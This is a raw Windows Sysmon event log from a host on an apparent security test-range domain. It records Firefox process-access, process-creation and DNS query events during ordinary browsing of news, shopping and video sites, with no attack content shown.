Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000018836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.203{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.52.1142864272\473900103" -childID 7 -isForBrowser -prefsHandle 8580 -prefMapHandle 948 -prefsLen 15932 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 3208 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000018827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.179{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2bd18cd|C:\Program Files\Mozilla Firefox\xul.dll+2ba6aa4|C:\Program Files\Mozilla Firefox\xul.dll+2ba89c6|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a 22542200x800000000000000018866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.134{59A5CD1D-945A-6005-3305-00000000A301}7052mediadb.kicker.de0type: 5 d1kt87jk3ydi5s.cloudfront.net;::ffff:143.204.215.65;::ffff:143.204.215.70;::ffff:143.204.215.89;::ffff:143.204.215.19;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.065{59A5CD1D-8E56-6005-2E00-00000000A301}246465.215.204.143.in-addr.arpa.0type: 12 server-143-204-215-65.fra53.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.138{59A5CD1D-945A-6005-3305-00000000A301}7052d1kt87jk3ydi5s.cloudfront.net02600:9000:2156:3400:f:18fa:cc00:93a1;2600:9000:2156:4800:f:18fa:cc00:93a1;2600:9000:2156:4e00:f:18fa:cc00:93a1;2600:9000:2156:7a00:f:18fa:cc00:93a1;2600:9000:2156:8200:f:18fa:cc00:93a1;2600:9000:2156:8400:f:18fa:cc00:93a1;2600:9000:2156:9c00:f:18fa:cc00:93a1;2600:9000:2156:aa00:f:18fa:cc00:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.135{59A5CD1D-945A-6005-3305-00000000A301}7052d1kt87jk3ydi5s.cloudfront.net0143.204.215.70;143.204.215.89;143.204.215.19;143.204.215.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.142{59A5CD1D-945A-6005-3305-00000000A301}7052dkmnl856gd5un.cloudfront.net02600:9000:214f:7000:16:7865:b7c0:93a1;2600:9000:214f:ba00:16:7865:b7c0:93a1;2600:9000:214f:ca00:16:7865:b7c0:93a1;2600:9000:214f:fa00:16:7865:b7c0:93a1;2600:9000:214f:1200:16:7865:b7c0:93a1;2600:9000:214f:3a00:16:7865:b7c0:93a1;2600:9000:214f:3c00:16:7865:b7c0:93a1;2600:9000:214f:3e00:16:7865:b7c0:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.123{59A5CD1D-945A-6005-3305-00000000A301}7052dkmnl856gd5un.cloudfront.net013.224.194.35;13.224.194.98;13.224.194.7;13.224.194.27;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.123{59A5CD1D-945A-6005-3305-00000000A301}7052www.kicker.de0type: 5 dkmnl856gd5un.cloudfront.net;::ffff:13.224.194.27;::ffff:13.224.194.35;::ffff:13.224.194.98;::ffff:13.224.194.7;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.100{59A5CD1D-945A-6005-3305-00000000A301}7052djvbdz1obemzo.cloudfront.net0143.204.205.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.100{59A5CD1D-945A-6005-3305-00000000A301}7052www.amazon.de0type: 5 tp.abe2c2f23-frontier.amazon.de;type: 5 djvbdz1obemzo.cloudfront.net;::ffff:143.204.205.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.100{59A5CD1D-945A-6005-3305-00000000A301}7052www.mozilla.org.cdn.cloudflare.net0104.18.165.34;104.18.164.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.100{59A5CD1D-945A-6005-3305-00000000A301}7052www.mozilla.org0type: 5 www.mozilla.org.cdn.cloudflare.net;::ffff:104.18.164.34;::ffff:104.18.165.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.097{59A5CD1D-945A-6005-3305-00000000A301}7052youtube-ui.l.google.com02a00:1450:4001:819::200e;2a00:1450:4001:820::200e;2a00:1450:4001:821::200e;2a00:1450:4001:817::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.095{59A5CD1D-945A-6005-3305-00000000A301}7052youtube-ui.l.google.com0172.217.16.206;172.217.18.110;172.217.18.174;172.217.21.206;172.217.22.14;172.217.22.110;172.217.23.110;172.217.23.142;172.217.23.174;216.58.205.238;216.58.206.14;216.58.212.142;216.58.212.174;142.250.74.206;172.217.16.142;172.217.16.174;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.095{59A5CD1D-945A-6005-3305-00000000A301}7052www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:172.217.16.174;::ffff:172.217.16.206;::ffff:172.217.18.110;::ffff:172.217.18.174;::ffff:172.217.21.206;::ffff:172.217.22.14;::ffff:172.217.22.110;::ffff:172.217.23.110;::ffff:172.217.23.142;::ffff:172.217.23.174;::ffff:216.58.205.238;::ffff:216.58.206.14;::ffff:216.58.212.142;::ffff:216.58.212.174;::ffff:142.250.74.206;::ffff:172.217.16.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:03.128{59A5CD1D-8E56-6005-2E00-00000000A301}2464183.210.65.128.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.838{59A5CD1D-945A-6005-3305-00000000A301}7052www.spiegel.de0type: 5 aacfb9d106f4.link11.de;::ffff:128.65.210.183;::ffff:128.65.210.184;::ffff:128.65.210.185;::ffff:128.65.210.180;::ffff:128.65.210.181;::ffff:128.65.210.182;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:04.502{59A5CD1D-945A-6005-3305-00000000A301}7052e11847.a.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:04.500{59A5CD1D-945A-6005-3305-00000000A301}7052e11847.a.akamaiedge.net0104.75.89.144;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:04.500{59A5CD1D-945A-6005-3305-00000000A301}7052ir.ebaystatic.com0type: 5 ir.ebaycdn.net;type: 5 ipv4.slot11847.ebay.com.edgekey.net;type: 5 e11847.a.akamaiedge.net;::ffff:104.75.89.144;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:06.213{59A5CD1D-8E56-6005-2E00-00000000A301}2464144.89.75.104.in-addr.arpa.0type: 12 